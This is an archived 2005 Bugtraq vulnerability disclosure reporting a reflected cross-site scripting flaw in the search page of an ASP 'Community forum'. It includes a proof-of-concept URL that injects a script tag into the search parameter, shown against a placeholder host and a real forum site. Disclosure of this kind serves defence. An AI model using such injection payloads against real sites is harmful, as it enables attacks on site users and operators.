Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: XSS IN Community forum

XSS IN Community forum

From: <abducter_minds_at_yahoo.com>
Date: 27 Jun 2005 23:30:17 -0000
('binary' encoding is not supported, stored as-is) there is aproplem in Community forum
community forum make by asp
i found a xss in search
when we typed
http://www.victim.com/forum/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=
EXAMPLE
http://forums.asp.net/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=

it will make a xss

credit

abducter_minds_at_yahoo.com
all ARAB { EGYPT }
Received on Jun 28 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]